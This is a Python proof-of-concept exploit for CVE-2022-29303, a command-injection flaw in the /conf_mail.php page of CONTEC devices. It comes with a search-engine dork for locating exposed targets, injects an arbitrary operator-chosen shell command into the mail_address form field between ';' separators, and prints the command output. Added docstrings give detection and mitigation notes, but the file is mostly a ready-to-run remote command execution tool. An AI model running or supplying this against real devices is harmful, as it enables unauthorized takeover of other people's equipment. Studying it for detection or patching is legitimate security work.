CVE-2022-29303-捡来的
#Dork : "Copyright(C) 2007-2014 CONTEC.CO.,LTD. All rights reserved"
import sys
import base64
import requests
import argparse
import urllib.parse
from bs4 import BeautifulSoup
# Command-line interface. Neither option is marked required, so a missing
# -u or -c is stored as None and is only detected later, inside main().
parser = argparse.ArgumentParser(
    epilog="Zoomeye Dork : \"Copyright(C) 2007-2014 CONTEC.CO.,LTD. All rights reserved\"\n",
    description="Example : python3 %(prog)s -u https://127.0.0.1 -c 'ls'",
    prog="CVE-2022-29303.py",
)
parser.add_argument("-u", help="Specify target URL", dest="url")
parser.add_argument("-c", help="Specify Command", dest="command")

# NOTE: arguments are parsed at import time, so importing this module reads
# sys.argv as a side effect.
args = parser.parse_args()

# Base64-encoded start-up banner. It decodes to an ASCII-art title followed by
# an author credit and a quotation; it holds no payload or configuration.
banner = "".join(
    [
        "ICAgX19fX18gICBfX19fXyAgIF9fXyBfXyBfX18gX19fICAgX19fIF9fXyBfX19fIF9fIF9fX18K",
        "ICAvIF9fXCBcIC8gLyBfX3xffF8gICkgIFxfICApXyAgKV98XyAgKSBfIFxfXyAvLyAgXF9fIC8K",
        "IHwgKF9fIFwgViAvfCBffF9fXy8gLyAoKSAvIC8gLyAvX19fLyAvXF8sIC98XyBcICgpIHxfIFwK",
        "ICBcX19ffCBcXy8gfF9fX3wgL19fX1xfXy9fX18vX19ffCAvX19ffC9fL3xfX18vXF9fL19fXy8K",
        "CgkgICAgICAgQ29kZWQgQnkgVmFsZW50aW4gTG9ic3RlaW4KICAgICAgICJXaXRoIGdyZWF0IHBv",
        "d2VyIGNvbWVzIGdyZWF0IHJlc3BvbnNpYmlsaXR5Igo=",
    ]
)
def main():
    """Send the CVE-2022-29303 proof-of-concept request and print the reply.

    One POST is made to ``<url>/conf_mail.php``. The ``mail_address`` form
    field carries the ``-c`` value wrapped in ``;`` separators, followed by
    ``id``. The response body is parsed as HTML and its text is printed up
    to, but not including, the first blank line.

    Defender notes:
      * Detection: in web-server or proxy logs, look for POST requests to
        ``/conf_mail.php`` whose ``mail_address`` value contains shell
        metacharacters (``;`` or its URL-encoded form ``%3B``). No
        credentials or session cookie accompany the request.
      * The User-Agent and Referer below are fixed browser-looking strings,
        so they should not be relied on to distinguish this client from a
        real browser.
      * Mitigation: install the vendor's fixed firmware and keep the device's
        management interface off untrusted networks.

    Exits through ``sys.exit()`` after printing the help text when either
    ``-u`` or ``-c`` is missing.
    """
    print("\n" + base64.b64decode(banner).decode("utf-8"))
    print('\nPlease wait... ')

    # Both options default to None; refuse to continue unless both were given.
    if None in vars(args).values():
        parser.print_help()
        sys.exit()

    target = args.url
    if '://' not in target:
        # A bare host or host:port is assumed to be served over HTTPS.
        target = f'https://{target}'

    # The field value is form-encoded by hand (quote_plus) because the body
    # is sent as a pre-built string rather than a dict.
    payload = urllib.parse.quote_plus('uselesscommand;' + args.command + ';id;')

    endpoint = f'{target}/conf_mail.php'
    request_headers = {
        'User-Agent': 'Mozilla/5.0 (X11; Linux x86_64; rv:91.0) Gecko/20100101 Firefox/91.0',
        'Accept': 'text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8',
        'Accept-Language': 'en-US,en;q=0.5',
        'Content-Type': 'application/x-www-form-urlencoded',
        'Origin': target,
        'Connection': 'close',
        'Referer': endpoint,
        'Upgrade-Insecure-Requests': '1',
    }

    # NOTE(review): the "button" bytes look like a Shift_JIS-encoded submit
    # label copied from the device's own form - confirm against the page.
    body = f'mail_address={payload}&button=%83%81%81%5B%83%8B%91%97%90M'

    # NOTE(review): verify=False turns off TLS certificate validation, so the
    # peer is not authenticated, and no timeout is set, so an unresponsive
    # host blocks this call indefinitely.
    reply = requests.post(endpoint, headers=request_headers, data=body, verify=False)

    # Strip the markup and keep only the leading run of non-empty lines.
    rows = BeautifulSoup(reply.text, "lxml").text.splitlines()
    cutoff = rows.index('') if '' in rows else len(rows)
    print('\n'.join(rows[:cutoff]))
# Script entry point: main() runs only when the file is executed directly.
# Argument parsing is not guarded here; it already happened at module level.
if __name__ == "__main__":
    main()